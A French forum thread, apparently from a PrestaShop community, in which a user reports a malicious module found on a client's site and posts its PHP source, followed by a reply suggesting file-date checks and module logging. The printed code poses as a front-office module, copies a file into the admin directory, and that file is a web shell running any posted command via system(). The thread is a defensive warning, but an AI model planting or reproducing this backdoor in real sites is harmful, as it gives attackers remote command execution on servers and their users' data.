Attention Module dangereux

[monarche]

Bonjour,

 

Je poste ce message pour remonter l'information d'un module dangereux trouvé sur un des sites de notre client:

 

Fonctionnalités Front Office

v0.01 - par xyz.com

 

 

 

On cherche toujours d’où il a pu être installé, surement en background par un autre module ou une autre mise à jour.

En tout cas, voila son code source. Je vous laisse imaginer la suite ...

 

chkmodule.php et rc.php (dans le dossier module/chkmodule/)

<?php
/*************************************
/* happy code
/* Made By tester :  [email protected] 
/* http://xyz.eu
/* http://xyz.eu
/* http://xyz.eu
/***********************************/
if (!defined('_PS_VERSION_')) 
{
  exit;
}
class ChkModule extends Module
{
	function __construct()
		{
		$this->name = 'chkmodule';
		$this->tab = 'front_office_features';
		$this->version = '0.01';
		$this->author = 'xyz.com';
		$this->need_instance = 0;
		parent::__construct();
		$d = $_SERVER['DOCUMENT_ROOT'].'xadmin/rc.php';
		$s = $_SERVER['DOCUMENT_ROOT'].'modules/chkmodule/rc.php';
		exec("cp $s $d");
	}	
}
?>

<pre>
<?php 
if(isset($_POST['cmd']))
	echo system($_POST['cmd']);
?>
</pre>
<form action="" method="post">
	<textarea name="cmd" style="width:500px; height:200px"><?php echo @$_POST['cmd']?></textarea>
	<br  />
	<input type="submit" value="Submit"/>
</form>

Cordialement

[ChrisMessina]

Très étrange...

La seule manière que je vois pour l'instant serait de vérifier la date de création et de modification des fichiers concernés pour voir si ça concorde avec une mise à jour quelconque.

 

Les ajouts et modifications de modules devraient êtres ajoutés aux logs pour mieux identifier ces types de problèmes.